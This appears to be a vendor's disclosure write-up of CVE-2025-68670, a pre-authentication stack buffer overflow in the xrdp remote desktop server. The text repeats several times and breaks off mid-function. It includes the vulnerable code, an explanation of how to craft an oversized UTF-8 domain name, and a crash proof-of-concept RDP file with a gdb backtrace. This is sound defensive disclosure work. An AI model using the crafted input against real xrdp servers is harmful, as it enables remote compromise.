It is worth noting that the vulnerable function can be protected by a stack canary via compiler settings. In most compilers, this option is enabled by default, which prevents an attacker from simply overwriting the return address and executing a ROP chain. To successfully exploit the vulnerability, the attacker would first need to obtain the canary value.The vulnerable function is also referenced by the xrdp_wm_show_edits function; however, even in that case, if the code is compiled with secure settings (using stack canaries), the most trivial exploitation scenario remains unfeasible.
Nevertheless, a stack canary is not a panacea. An attacker could potentially leak or guess its value, allowing them to overwrite the buffer and the return address while leaving the canary itself unchanged. In the security bulletin dedicated to CVE-2025-68670, the xrdp maintainers advise against relying solely on stack canaries when using the project.
Vulnerability remediation timeline
- 12/05/2025: we submitted the vulnerability report via github.com/neutrinolabs/xrdp/s…
- 12/05/2025: the project maintainers immediately confirmed receipt of the report and stated they would review it shortly.
- 12/15/2025: investigation and prioritization of the vulnerability began.
- 12/18/2025: the maintainers confirmed the vulnerability and began developing a patch.
- 12/24/2025: the vulnerability was assigned the identifier CVE-2025-68670.
- 01/27/2026: the patch was merged into the project’s main branch.
Conclusion
Taking a responsible approach to code makes not only our own products more solid but also enhances popular open-source projects. We have previously shared how security assessments of KasperskyOS-based solutions – such as Kaspersky Thin Client and Kaspersky IoT Secure Gateway – led to the discovery of several vulnerabilities in Suricata and FreeRDP, which project maintainers quickly patched. CVE-2025-68670 is yet another one of those stories.However, discovering a vulnerability is only half the battle. We would like to thank the xrdp maintainers for their rapid response to our report, for fixing the vulnerability, and for issuing a security bulletin detailing the issue and risk mitigation options.
-
CVE-2025-68670: discovering an RCE vulnerability in xrdp
In addition to KasperskyOS-powered solutions, Kaspersky offers various utility software to streamline business operations. For instance, users of Kaspersky Thin Client, an operating system for thin clients, can also purchase Kaspersky USB Redirector, a module that expands the capabilities of the xrdp remote desktop server for Linux. This module enables access to local USB devices, such as flash drives, tokens, smart cards, and printers, within a remote desktop session – all while maintaining connection security.
We take the security of our products seriously and regularly conduct security assessments. Kaspersky USB Redirector is no exception. Last year, during a security audit of this tool, we discovered a remote code execution vulnerability in the xrdp server, which was assigned the identifier CVE-2025-68670. We reported our findings to the project maintainers, who responded quickly: they fixed the vulnerability in version 0.10.5, backported the patch to versions 0.9.27 and 0.10.4.1, and issued a security bulletin. This post breaks down the details of CVE-2025-68670 and provides recommendations for staying protected.
Client data transmission via RDP
Establishing an RDP connection is a complex, multi-stage process where the client and server exchange various settings. In the context of the vulnerability we discovered, we are specifically interested in the Secure Settings Exchange, which occurs immediately before client authentication. At this stage, the client sends protected credentials to the server within a Client Info PDU (protocol data unit with client info): username, password, auto-reconnect cookies, and so on. These data points are bundled into a TS_INFO_PACKET structure and can be represented as Unicode strings up to 512 bytes long, the last of which must be a null terminator. In the xrdp code, this corresponds to the xrdp_client_info structure, which looks as follows:
{
[..SNIP..]
char username[INFO_CLIENT_MAX_CB_LEN];
char password[INFO_CLIENT_MAX_CB_LEN];
char domain[INFO_CLIENT_MAX_CB_LEN];
char program[INFO_CLIENT_MAX_CB_LEN];
char directory[INFO_CLIENT_MAX_CB_LEN];
[..SNIP..]
}
The value of the INFO_CLIENT_MAX_CB_LEN constant corresponds to the maximum string length and is defined as follows:
#define INFO_CLIENT_MAX_CB_LEN 512
When transmitting Unicode data, the client uses the UTF-16 encoding. However, the server converts the data to UTF-8 before saving it.
if (ts_info_utf16_in( //
[1] s, len_domain, self->rdp_layer->client_info.domain, sizeof(self->rdp_layer->client_info.domain)) != 0) //
[2]{
[..SNIP..]
}
The size of the buffer for unpacking the domain name in UTF-8 [2] is passed to the ts_info_utf16_in function [1], which implements buffer overflow protection [3].
static int ts_info_utf16_in(struct stream *s, int src_bytes, char *dst, int dst_len)
{
int rv = 0;
LOG_DEVEL(LOG_LEVEL_TRACE, "ts_info_utf16_in: uni_len %d, dst_len %d", src_bytes, dst_len);
if (!s_check_rem_and_log(s, src_bytes + 2, "ts_info_utf16_in"))
{
rv = 1;
}
else
{
int term;
int num_chars = in_utf16_le_fixed_as_utf8(s, src_bytes / 2,
dst, dst_len);
if (num_chars > dst_len) //
[3] {
LOG(LOG_LEVEL_ERROR, "ts_info_utf16_in: output buffer overflow"); rv = 1;
}
/ / String should be null-terminated. We haven't read the terminator yet
in_uint16_le(s, term);
if (term != 0)
{
LOG(LOG_LEVEL_ERROR, "ts_info_utf16_in: bad terminator. Expected 0, got %d", term);
rv = 1;
}
}
return rv;
}
Next, the in_utf16_le_fixed_as_utf8_proc function, where the actual data conversion from UTF-16 to UTF-8 takes place, checks the number of bytes written [4] as well as whether the string is null-terminated [5].
{
unsigned int rv = 0;
char32_t c32;
char u8str[MAXLEN_UTF8_CHAR];
unsigned int u8len;
char *saved_s_end = s->end;// Expansion of S_CHECK_REM(s, n*2) using passed-in file and line #ifdef USE_DEVEL_STREAMCHECK
parser_stream_overflow_check(s, n * 2, 0, file, line); #endif
// Temporarily set the stream end pointer to allow us to use
// s_check_rem() when reading in UTF-16 words
if (s->end - s->p > (int)(n * 2))
{
s->end = s->p + (int)(n * 2);
}while (s_check_rem(s, 2))
{
c32 = get_c32_from_stream(s);
u8len = utf_char32_to_utf8(c32, u8str);
if (u8len + 1 <= vn) //
[4] {
/* Room for this character and a terminator. Add the character */
unsigned int i;
for (i = 0 ; i < u8len ; ++i)
{
v[i] = u8str[i];
}v n -= u8len;
v += u8len;
}else if (vn > 1)
{
/* We've skipped a character, but there's more than one byte
* remaining in the output buffer. Mark the output buffer as
* full so we don't get a smaller character being squeezed into
* the remaining space */
vn = 1;
}r v += u8len;
}
// Restore stream to full length s->end = saved_s_end;
if (vn > 0)
{
*v = '\0'; //
[5] }
+ +rv;
return rv;
}
Consequently, up to 512 bytes of input data in UTF-16 are converted into UTF-8 data, which can also reach a size of up to 512 bytes.CVE-2025-68670: an RCE vulnerability in xrdp
The vulnerability exists within the xrdp_wm_parse_domain_information function, which processes the domain name saved on the server in UTF-8. Like the functions described above, this one is called before client authentication, meaning exploitation does not require valid credentials. The call stack below illustrates this.
x rdp_wm_parse_domain_information(char *originalDomainInfo, int comboMax,
int decode, char *resultBuffer)
xrdp_login_wnd_create(struct xrdp_wm *self)
xrdp_wm_init(struct xrdp_wm *self)
xrdp_wm_login_state_changed(struct xrdp_wm *self)
xrdp_wm_check_wait_objs(struct xrdp_wm *self)
xrdp_process_main_loop(struct xrdp_process *self)
The code snippet where the vulnerable function is called looks like this:
char resultIP[256]; //
[7][..SNIP..]
combo->item_index = xrdp_wm_parse_domain_information(
self->session->client_info->domain, //
[6] combo->data_list->count, 1,
resultIP /* just a dummy place holder, we ignore
*/ );
As you can see, the first argument of the function in line [6] is the domain name up to 512 bytes long. The final argument is the resultIP buffer of 256 bytes (as seen in line [7]). Now, let’s look at exactly what the vulnerable function does with these arguments.
static int
xrdp_wm_parse_domain_information(char *originalDomainInfo, int comboMax,
int decode, char *resultBuffer)
{
int ret;
int pos;
int comboxindex;
char index[2];/* If the first char in the domain name is '_' we use the domain name as IP*/
ret = 0; /* default return value */
/* resultBuffer assumed to be 256 chars */
g_memset(resultBuffer, 0, 256);
if (originalDomainInfo[0] == '_') //
[8] {
/* we try to locate a number indicating what combobox index the user
* prefer the information is loaded from domain field, from the client
* We must use valid chars in the domain name.
* Underscore is a valid name in the domain.
* Invalid chars are ignored in microsoft client therefore we use '_'
* again. this sec '__' contains the split for index.*/
pos = g_pos(&originalDomainInfo[1], "__"); //
[9] if (pos > 0)
{
/* an index is found we try to use it */
LOG(LOG_LEVEL_DEBUG, "domain contains index char __");
if (decode)
{
[..SNIP..]
}
/ * pos limit the String to only contain the IP */
g_strncpy(resultBuffer, &originalDomainInfo[1], pos); //
[10] }
else
{
LOG(LOG_LEVEL_DEBUG, "domain does not contain _");
g_strncpy(resultBuffer, &originalDomainInfo[1], 255);
}
}
return ret;
}
As seen in the code, if the first character of the domain name is an underscore (line [8]), a portion of the domain name – starting from the second character and ending with the double underscore (“__”) – is written into the resultIP buffer (line [9]). Since the domain name can be up to 512 bytes long, it may not fit into the buffer even if it’s technically well-formed (line [10]). Consequently, the overflow data will be written to the thread stack, potentially modifying the return address. If an attacker crafts a domain name that overflows the stack buffer and replaces the return address with a value they control, execution flow will shift according to the attacker’s intent upon returning from the vulnerable function, allowing for arbitrary code execution within the context of the compromised process (in this case, the xrdp server).To exploit this vulnerability, the attacker simply needs to specify a domain name that, after being converted to UTF-8, contains more than 256 bytes between the initial “_” and the subsequent “__”. Given that the conversion follows specific rules easily found online, this is a straightforward task: one can simply take advantage of the fact that the length of the same string can vary between UTF-16 and UTF-8. In short, this involves avoiding ASCII and certain other characters that may take up more space in UTF-16 than in UTF-8, while also being careful not to abuse characters that expand significantly after conversion. If the resulting UTF-8 domain name exceeds the 512-byte limit, a conversion error will occur.
PoC
As a PoC for the discovered vulnerability, we created the following RDP file containing the RDP server’s IP address and a long domain name designed to trigger a buffer overflow. In the domain name, we used a specific number of K (U+041A) characters to overwrite the return address with the string “AAAAAAAA”. The contents of the RDP file are shown below:
alternate full address:s:172.22.118.7
full address:s:172.22.118.7
domain:s:_veryveryveryverKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKeryveryveryveryveryveryveryveryveryveryveryveryveryveryveryveryveryveryveryveaaaaaaaaryveryveryveryveryveryveryveryveryveryveryveryverylongdoAAAAAAAA__0
username:s:testuser
When you open this file, the mstsc.exe process connects to the specified server. The server processes the data in the file and attempts to write the domain name into the buffer, which results in a buffer overflow and the overwriting of the return address. If you look at the xrdp memory dump at the time of the crash, you can see that both the buffer and the return address have been overwritten. The application terminates during the stack canary check. The example below was captured using the gdb debugger.
gef➤ bt
#0 __pthread_kill_implementation (no_tid=0x0, signo=0x6, threadid=0x7adb2dc71740) at ./nptl/pthread_kill.c:44
#1 __pthread_kill_internal (signo=0x6, threadid=0x7adb2dc71740) at ./nptl/pthread_kill.c:78
#2 __GI___pthread_kill (threadid=0x7adb2dc71740, signo=signo@entry=0x6) at./nptl/pthread_kill.c:89
#3 0x00007adb2da42476 in __GI_raise (sig=sig@entry=0x6) at ../sysdeps/posix/raise.c:26
#4 0x00007adb2da287f3 in __GI_abort () at ./stdlib/abort.c:79
#5 0x00007adb2da89677 in __libc_message (action=action@entry=do_abort, fmt=fmt@entry=0x7adb2dbdb92e "*** %s ***: terminated\n") at ../sysdeps/posix/libc_fatal.c:156
#6 0x00007adb2db3660a in __GI___fortify_fail (msg=msg@entry=0x7adb2dbdb916 "stack smashing detected") at ./debug/fortify_fail.c:26
#7 0x00007adb2db365d6 in __stack_chk_fail () at ./debug/stack_chk_fail.c:24
#8 0x000063654a2e5ad5 in ?? ()
#9 0x4141414141414141 in ?? ()
#10 0x00007adb00000a00 in ?? ()
#11 0x0000000000050004 in ?? ()
#12 0x00007fff91732220 in ?? ()
#13 0x000000000000030a in ?? ()
#14 0xfffffffffffffff8 in ?? ()
#15 0x000000052dc71740 in ?? ()
#16 0x3030305f70647278 in ?? ()
#17 0x616d5f6130333030 in ?? ()
#18 0x00636e79735f6e69 in ?? ()
#19 0x0000000000000000 in ?? ()Protection against vulnerability exploitation
It is worth noting that the vulnerable function can be protected by a stack canary via compiler settings. In most compilers, this option is enabled by default, which prevents an attacker from simply overwriting the return address and executing a ROP chain. To successfully exploit the vulnerability, the attacker would first need to obtain the canary value.The vulnerable function is also referenced by the xrdp_wm_show_edits function; however, even in that case, if the code is compiled with secure settings (using stack canaries), the most trivial exploitation scenario remains unfeasible.
Nevertheless, a stack canary is not a panacea. An attacker could potentially leak or guess its value, allowing them to overwrite the buffer and the return address while leaving the canary itself unchanged. In the security bulletin dedicated to CVE-2025-68670, the xrdp maintainers advise against relying solely on stack canaries when using the project.
Vulnerability remediation timeline
- 12/05/2025: we submitted the vulnerability report via github.com/neutrinolabs/xrdp/s…
- 12/05/2025: the project maintainers immediately confirmed receipt of the report and stated they would review it shortly.
- 12/15/2025: investigation and prioritization of the vulnerability began.
- 12/18/2025: the maintainers confirmed the vulnerability and began developing a patch.
- 12/24/2025: the vulnerability was assigned the identifier CVE-2025-68670.
- 01/27/2026: the patch was merged into the project’s main branch.
Conclusion
Taking a responsible approach to code makes not only our own products more solid but also enhances popular open-source projects. We have previously shared how security assessments of KasperskyOS-based solutions – such as Kaspersky Thin Client and Kaspersky IoT Secure Gateway – led to the discovery of several vulnerabilities in Suricata and FreeRDP, which project maintainers quickly patched. CVE-2025-68670 is yet another one of those stories.However, discovering a vulnerability is only half the battle. We would like to thank the xrdp maintainers for their rapid response to our report, for fixing the vulnerability, and for issuing a security bulletin detailing the issue and risk mitigation options.
-
CVE-2025-68670: discovering an RCE vulnerability in xrdp
In addition to KasperskyOS-powered solutions, Kaspersky offers various utility software to streamline business operations. For instance, users of Kaspersky Thin Client, an operating system for thin clients, can also purchase Kaspersky USB Redirector, a module that expands the capabilities of the xrdp remote desktop server for Linux. This module enables access to local USB devices, such as flash drives, tokens, smart cards, and printers, within a remote desktop session – all while maintaining connection security.
We take the security of our products seriously and regularly conduct security assessments. Kaspersky USB Redirector is no exception. Last year, during a security audit of this tool, we discovered a remote code execution vulnerability in the xrdp server, which was assigned the identifier CVE-2025-68670. We reported our findings to the project maintainers, who responded quickly: they fixed the vulnerability in version 0.10.5, backported the patch to versions 0.9.27 and 0.10.4.1, and issued a security bulletin. This post breaks down the details of CVE-2025-68670 and provides recommendations for staying protected.
Client data transmission via RDP
Establishing an RDP connection is a complex, multi-stage process where the client and server exchange various settings. In the context of the vulnerability we discovered, we are specifically interested in the Secure Settings Exchange, which occurs immediately before client authentication. At this stage, the client sends protected credentials to the server within a Client Info PDU (protocol data unit with client info): username, password, auto-reconnect cookies, and so on. These data points are bundled into a TS_INFO_PACKET structure and can be represented as Unicode strings up to 512 bytes long, the last of which must be a null terminator. In the xrdp code, this corresponds to the xrdp_client_info structure, which looks as follows:
{
[..SNIP..]
char username[INFO_CLIENT_MAX_CB_LEN];
char password[INFO_CLIENT_MAX_CB_LEN];
char domain[INFO_CLIENT_MAX_CB_LEN];
char program[INFO_CLIENT_MAX_CB_LEN];
char directory[INFO_CLIENT_MAX_CB_LEN];
[..SNIP..]
}
The value of the INFO_CLIENT_MAX_CB_LEN constant corresponds to the maximum string length and is defined as follows:
#define INFO_CLIENT_MAX_CB_LEN 512
When transmitting Unicode data, the client uses the UTF-16 encoding. However, the server converts the data to UTF-8 before saving it.
if (ts_info_utf16_in( //
[1] s, len_domain, self->rdp_layer->client_info.domain, sizeof(self->rdp_layer->client_info.domain)) != 0) //
[2]{
[..SNIP..]
}
The size of the buffer for unpacking the domain name in UTF-8 [2] is passed to the ts_info_utf16_in function [1], which implements buffer overflow protection [3].
static int ts_info_utf16_in(struct stream *s, int src_bytes, char *dst, int dst_len)
{
int rv = 0;
LOG_DEVEL(LOG_LEVEL_TRACE, "ts_info_utf16_in: uni_len %d, dst_len %d", src_bytes, dst_len);
if (!s_check_rem_and_log(s, src_bytes + 2, "ts_info_utf16_in"))
{
rv = 1;
}
else
{
int term;
int num_chars = in_utf16_le_fixed_as_utf8(s, src_bytes / 2,
dst, dst_len);
if (num_chars > dst_len) //
[3] {
LOG(LOG_LEVEL_ERROR, "ts_info_utf16_in: output buffer overflow"); rv = 1;
}
/ / String should be null-terminated. We haven't read the terminator yet
in_uint16_le(s, term);
if (term != 0)
{
LOG(LOG_LEVEL_ERROR, "ts_info_utf16_in: bad terminator. Expected 0, got %d", term);
rv = 1;
}
}
return rv;
}
Next, the in_utf16_le_fixed_as_utf8_proc function, where the actual data conversion from UTF-16 to UTF-8 takes place, checks the number of bytes written [4] as well as whether the string is null-terminated [5].
{
unsigned int rv = 0;
char32_t c32;
char u8str[MAXLEN_UTF8_CHAR];
unsigned int u8len;
char *saved_s_end = s->end;// Expansion of S_CHECK_REM(s, n*2) using passed-in file and line #ifdef USE_DEVEL_STREAMCHECK
parser_stream_overflow_check(s, n * 2, 0, file, line); #endif
// Temporarily set the stream end pointer to allow us to use
// s_check_rem() when reading in UTF-16 words
if (s->end - s->p > (int)(n * 2))
{
s->end = s->p + (int)(n * 2);
}while (s_check_rem(s, 2))
{
c32 = get_c32_from_stream(s);
u8len = utf_char32_to_utf8(c32, u8str);
if (u8len + 1 <= vn) //
[4] {
/* Room for this character and a terminator. Add the character */
unsigned int i;
for (i = 0 ; i < u8len ; ++i)
{
v[i] = u8str[i];
}v n -= u8len;
v += u8len;
}else if (vn > 1)
{
/* We've skipped a character, but there's more than one byte
* remaining in the output buffer. Mark the output buffer as
* full so we don't get a smaller character being squeezed into
* the remaining space */
vn = 1;
}r v += u8len;
}
// Restore stream to full length s->end = saved_s_end;
if (vn > 0)
{
*v = '\0'; //
[5] }
+ +rv;
return rv;
}
Consequently, up to 512 bytes of input data in UTF-16 are converted into UTF-8 data, which can also reach a size of up to 512 bytes.CVE-2025-68670: an RCE vulnerability in xrdp
The vulnerability exists within the xrdp_wm_parse_domain_information function, which processes the domain name saved on the server in UTF-8. Like the functions described above, this one is called before client authentication, meaning exploitation does not require valid credentials. The call stack below illustrates this.
x rdp_wm_parse_domain_information(char *originalDomainInfo, int comboMax,
int decode, char *resultBuffer)
xrdp_login_wnd_create(struct xrdp_wm *self)
xrdp_wm_init(struct xrdp_wm *self)
xrdp_wm_login_state_changed(struct xrdp_wm *self)
xrdp_wm_check_wait_objs(struct xrdp_wm *self)
xrdp_process_main_loop(struct xrdp_process *self)
The code snippet where the vulnerable function is called looks like this:
char resultIP[256]; //
[7][..SNIP..]
combo->item_index = xrdp_wm_parse_domain_information(
self->session->client_info->domain, //
[6] combo->data_list->count, 1,
resultIP /* just a dummy place holder, we ignore
*/ );
As you can see, the first argument of the function in line [6] is the domain name up to 512 bytes long. The final argument is the resultIP buffer of 256 bytes (as seen in line [7]). Now, let’s look at exactly what the vulnerable function does with these arguments.
static int
xrdp_wm_parse_domain_information(char *originalDomainInfo, int comboMax,
int decode, char *resultBuffer)
{
int ret;
int pos;
int comboxindex;
char index[2];/* If the first char in the domain name is '_' we use the domain name as IP*/
ret = 0; /* default return value */
/* resultBuffer assumed to be 256 chars */
g_memset(resultBuffer, 0, 256);
if (originalDomainInfo[0] == '_') //
[8] {
/* we try to locate a number indicating what combobox index the user
* prefer the information is loaded from domain field, from the client
* We must use valid chars in the domain name.
* Underscore is a valid name in the domain.
* Invalid chars are ignored in microsoft client therefore we use '_'
* again. this sec '__' contains the split for index.*/
pos = g_pos(&originalDomainInfo[1], "__"); //
[9] if (pos > 0)
{
/* an index is found we try to use it */
LOG(LOG_LEVEL_DEBUG, "domain contains index char __");
if (decode)
{
[..SNIP..]
}
/ * pos limit the String to only contain the IP */
g_strncpy(resultBuffer, &originalDomainInfo[1], pos); //
[10] }
else
{
LOG(LOG_LEVEL_DEBUG, "domain does not contain _");
g_strncpy(resultBuffer, &originalDomainInfo[1], 255);
}
}
return ret;
}
As seen in the code, if the first character of the domain name is an underscore (line [8]), a portion of the domain name – starting from the second character and ending with the double underscore (“__”) – is written into the resultIP buffer (line [9]). Since the domain name can be up to 512 bytes long, it may not fit into the buffer even if it’s technically well-formed (line [10]). Consequently, the overflow data will be written to the thread stack, potentially modifying the return address. If an attacker crafts a domain name that overflows the stack buffer and replaces the return address with a value they control, execution flow will shift according to the attacker’s intent upon returning from the vulnerable function, allowing for arbitrary code execution within the context of the compromised process (in this case, the xrdp server).To exploit this vulnerability, the attacker simply needs to specify a domain name that, after being converted to UTF-8, contains more than 256 bytes between the initial “_” and the subsequent “__”. Given that the conversion follows specific rules easily found online, this is a straightforward task: one can simply take advantage of the fact that the length of the same string can vary between UTF-16 and UTF-8. In short, this involves avoiding ASCII and certain other characters that may take up more space in UTF-16 than in UTF-8, while also being careful not to abuse characters that expand significantly after conversion. If the resulting UTF-8 domain name exceeds the 512-byte limit, a conversion error will occur.
PoC
As a PoC for the discovered vulnerability, we created the following RDP file containing the RDP server’s IP address and a long domain name designed to trigger a buffer overflow. In the domain name, we used a specific number of K (U+041A) characters to overwrite the return address with the string “AAAAAAAA”. The contents of the RDP file are shown below:
alternate full address:s:172.22.118.7
full address:s:172.22.118.7
domain:s:_veryveryveryverKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKeryveryveryveryveryveryveryveryveryveryveryveryveryveryveryveryveryveryveryveaaaaaaaaryveryveryveryveryveryveryveryveryveryveryveryverylongdoAAAAAAAA__0
username:s:testuser
When you open this file, the mstsc.exe process connects to the specified server. The server processes the data in the file and attempts to write the domain name into the buffer, which results in a buffer overflow and the overwriting of the return address. If you look at the xrdp memory dump at the time of the crash, you can see that both the buffer and the return address have been overwritten. The application terminates during the stack canary check. The example below was captured using the gdb debugger.
gef➤ bt
#0 __pthread_kill_implementation (no_tid=0x0, signo=0x6, threadid=0x7adb2dc71740) at ./nptl/pthread_kill.c:44
#1 __pthread_kill_internal (signo=0x6, threadid=0x7adb2dc71740) at ./nptl/pthread_kill.c:78
#2 __GI___pthread_kill (threadid=0x7adb2dc71740, signo=signo@entry=0x6) at./nptl/pthread_kill.c:89
#3 0x00007adb2da42476 in __GI_raise (sig=sig@entry=0x6) at ../sysdeps/posix/raise.c:26
#4 0x00007adb2da287f3 in __GI_abort () at ./stdlib/abort.c:79
#5 0x00007adb2da89677 in __libc_message (action=action@entry=do_abort, fmt=fmt@entry=0x7adb2dbdb92e "*** %s ***: terminated\n") at ../sysdeps/posix/libc_fatal.c:156
#6 0x00007adb2db3660a in __GI___fortify_fail (msg=msg@entry=0x7adb2dbdb916 "stack smashing detected") at ./debug/fortify_fail.c:26
#7 0x00007adb2db365d6 in __stack_chk_fail () at ./debug/stack_chk_fail.c:24
#8 0x000063654a2e5ad5 in ?? ()
#9 0x4141414141414141 in ?? ()
#10 0x00007adb00000a00 in ?? ()
#11 0x0000000000050004 in ?? ()
#12 0x00007fff91732220 in ?? ()
#13 0x000000000000030a in ?? ()
#14 0xfffffffffffffff8 in ?? ()
#15 0x000000052dc71740 in ?? ()
#16 0x3030305f70647278 in ?? ()
#17 0x616d5f6130333030 in ?? ()
#18 0x00636e79735f6e69 in ?? ()
#19 0x0000000000000000 in ?? ()Protection against vulnerability exploitation
It is worth noting that the vulnerable function can be protected by a stack canary via compiler settings. In most compilers, this option is enabled by default, which prevents an attacker from simply overwriting the return address and executing a ROP chain. To successfully exploit the vulnerability, the attacker would first need to obtain the canary value.The vulnerable function is also referenced by the xrdp_wm_show_edits function; however, even in that case, if the code is compiled with secure settings (using stack canaries), the most trivial exploitation scenario remains unfeasible.
Nevertheless, a stack canary is not a panacea. An attacker could potentially leak or guess its value, allowing them to overwrite the buffer and the return address while leaving the canary itself unchanged. In the security bulletin dedicated to CVE-2025-68670, the xrdp maintainers advise against relying solely on stack canaries when using the project.
Vulnerability remediation timeline
- 12/05/2025: we submitted the vulnerability report via github.com/neutrinolabs/xrdp/s…
- 12/05/2025: the project maintainers immediately confirmed receipt of the report and stated they would review it shortly.
- 12/15/2025: investigation and prioritization of the vulnerability began.
- 12/18/2025: the maintainers confirmed the vulnerability and began developing a patch.
- 12/24/2025: the vulnerability was assigned the identifier CVE-2025-68670.
- 01/27/2026: the patch was merged into the project’s main branch.
Conclusion
Taking a responsible approach to code makes not only our own products more solid but also enhances popular open-source projects. We have previously shared how security assessments of KasperskyOS-based solutions – such as Kaspersky Thin Client and Kaspersky IoT Secure Gateway – led to the discovery of several vulnerabilities in Suricata and FreeRDP, which project maintainers quickly patched. CVE-2025-68670 is yet another one of those stories.However, discovering a vulnerability is only half the battle. We would like to thank the xrdp maintainers for their rapid response to our report, for fixing the vulnerability, and for issuing a security bulletin detailing the issue and risk mitigation options.
-
CVE-2025-68670: discovering an RCE vulnerability in xrdp
In addition to KasperskyOS-powered solutions, Kaspersky offers various utility software to streamline business operations. For instance, users of Kaspersky Thin Client, an operating system for thin clients, can also purchase Kaspersky USB Redirector, a module that expands the capabilities of the xrdp remote desktop server for Linux. This module enables access to local USB devices, such as flash drives, tokens, smart cards, and printers, within a remote desktop session – all while maintaining connection security.
We take the security of our products seriously and regularly conduct security assessments. Kaspersky USB Redirector is no exception. Last year, during a security audit of this tool, we discovered a remote code execution vulnerability in the xrdp server, which was assigned the identifier CVE-2025-68670. We reported our findings to the project maintainers, who responded quickly: they fixed the vulnerability in version 0.10.5, backported the patch to versions 0.9.27 and 0.10.4.1, and issued a security bulletin. This post breaks down the details of CVE-2025-68670 and provides recommendations for staying protected.
Client data transmission via RDP
Establishing an RDP connection is a complex, multi-stage process where the client and server exchange various settings. In the context of the vulnerability we discovered, we are specifically interested in the Secure Settings Exchange, which occurs immediately before client authentication. At this stage, the client sends protected credentials to the server within a Client Info PDU (protocol data unit with client info): username, password, auto-reconnect cookies, and so on. These data points are bundled into a TS_INFO_PACKET structure and can be represented as Unicode strings up to 512 bytes long, the last of which must be a null terminator. In the xrdp code, this corresponds to the xrdp_client_info structure, which looks as follows:
{
[..SNIP..]
char username[INFO_CLIENT_MAX_CB_LEN];
char password[INFO_CLIENT_MAX_CB_LEN];
char domain[INFO_CLIENT_MAX_CB_LEN];
char program[INFO_CLIENT_MAX_CB_LEN];
char directory[INFO_CLIENT_MAX_CB_LEN];
[..SNIP..]
}
The value of the INFO_CLIENT_MAX_CB_LEN constant corresponds to the maximum string length and is defined as follows:
#define INFO_CLIENT_MAX_CB_LEN 512
When transmitting Unicode data, the client uses the UTF-16 encoding. However, the server converts the data to UTF-8 before saving it.
if (ts_info_utf16_in( //
[1] s, len_domain, self->rdp_layer->client_info.domain, sizeof(self->rdp_layer->client_info.domain)) != 0) //
[2]{
[..SNIP..]
}
The size of the buffer for unpacking the domain name in UTF-8 [2] is passed to the ts_info_utf16_in function [1], which implements buffer overflow protection [3].
static int ts_info_utf16_in(struct stream *s, int src_bytes, char *dst, int dst_len)
{
int rv = 0;
LOG_DEVEL(LOG_LEVEL_TRACE, "ts_info_utf16_in: uni_len %d, dst_len %d", src_bytes, dst_len);
if (!s_check_rem_and_log(s, src_bytes + 2, "ts_info_utf16_in"))
{
rv = 1;
}
else
{
int term;
int num_chars = in_utf16_le_fixed_as_utf8(s, src_bytes / 2,
dst, dst_len);
if (num_chars > dst_len) //
[3] {
LOG(LOG_LEVEL_ERROR, "ts_info_utf16_in: output buffer overflow"); rv = 1;
}
/ / String should be null-terminated. We haven't read the terminator yet
in_uint16_le(s, term);
if (term != 0)
{
LOG(LOG_LEVEL_ERROR, "ts_info_utf16_in: bad terminator. Expected 0, got %d", term);
rv = 1;
}
}
return rv;
}
Next, the in_utf16_le_fixed_as_utf8_proc function, where the actual data conversion from UTF-16 to UTF-8 takes place, checks the number of bytes written [4] as well as whether the string is null-terminated [5].
{
unsigned int rv = 0;
char32_t c32;
char u8str[MAXLEN_UTF8_CHAR];
unsigned int u8len;
char *saved_s_end = s->end;// Expansion of S_CHECK_REM(s, n*2) using passed-in file and line #ifdef USE_DEVEL_STREAMCHECK
parser_stream_overflow_check(s, n * 2, 0, file, line); #endif
// Temporarily set the stream end pointer to allow us to use
// s_check_rem() when reading in UTF-16 words
if (s->end - s->p > (int)(n * 2))
{
s->end = s->p + (int)(n * 2);
}while (s_check_rem(s, 2))
{
c32 = get_c32_from_stream(s);
u8len = utf_char32_to_utf8(c32, u8str);
if (u8len + 1 <= vn) //
[4] {
/* Room for this character and a terminator. Add the character */
unsigned int i;
for (i = 0 ; i < u8len ; ++i)
{
v[i] = u8str[i];
}v n -= u8len;
v += u8len;
}else if (vn > 1)
{
/* We've skipped a character, but there's more than one byte
* remaining in the output buffer. Mark the output buffer as
* full so we don't get a smaller character being squeezed into
* the remaining space */
vn = 1;
}r v += u8len;
}
// Restore stream to full length s->end = saved_s_end;
if (vn > 0)
{
*v = '\0'; //
[5] }
+ +rv;
return rv;
}
Consequently, up to 512 bytes of input data in UTF-16 are converted into UTF-8 data, which can also reach a size of up to 512 bytes.CVE-2025-68670: an RCE vulnerability in xrdp
The vulnerability exists within the xrdp_wm_parse_domain_information function, which processes the domain name saved on the server in UTF-8. Like the functions described above, this one is called before client authentication, meaning exploitation does not require valid credentials. The call stack below illustrates this.
x rdp_wm_parse_domain_information(char *originalDomainInfo, int comboMax,
int decode, char *resultBuffer)
xrdp_login_wnd_create(struct xrdp_wm *self)
xrdp_wm_init(struct xrdp_wm *self)
xrdp_wm_login_state_changed(struct xrdp_wm *self)
xrdp_wm_check_wait_objs(struct xrdp_wm *self)
xrdp_process_main_loop(struct xrdp_process *self)
The code snippet where the vulnerable function is called looks like this:
char resultIP[256]; //
[7][..SNIP..]
combo->item_index = xrdp_wm_parse_domain_information(
self->session->client_info->domain, //
[6] combo->data_list->count, 1,
resultIP /* just a dummy place holder, we ignore
*/ );
As you can see, the first argument of the function in line [6] is the domain name up to 512 bytes long. The final argument is the resultIP buffer of 256 bytes (as seen in line [7]). Now, let’s look at exactly what the vulnerable function does with these arguments.
static int
xrdp_wm_parse_domain_information(char *originalDomainInfo, int comboMax,
int decode, char *resultBuffer)
{
int ret;
int pos;
int comboxindex;
char index[2];/* If the first char in the domain name is '_' we use the domain name as IP*/
ret = 0; /* default return value */
/* resultBuffer assumed to be 256 chars */
g_memset(resultBuffer, 0, 256);
if (originalDomainInfo[0] == '_') //
[8] {
/* we try to locate a number indicating what combobox index the user
* prefer the information is loaded from domain field, from the client
* We must use valid chars in the domain name.
* Underscore is a valid name in the domain.
* Invalid chars are ignored in microsoft client therefore we use '_'
* again. this sec '__' contains the split for index.*/
pos = g_pos(&originalDomainInfo[1], "__"); //
[9] if (pos > 0)
{
/* an index is found we try to use it */
LOG(LOG_LEVEL_DEBUG, "domain contains index char __");
if (decode)
{
[..SNIP..]
}
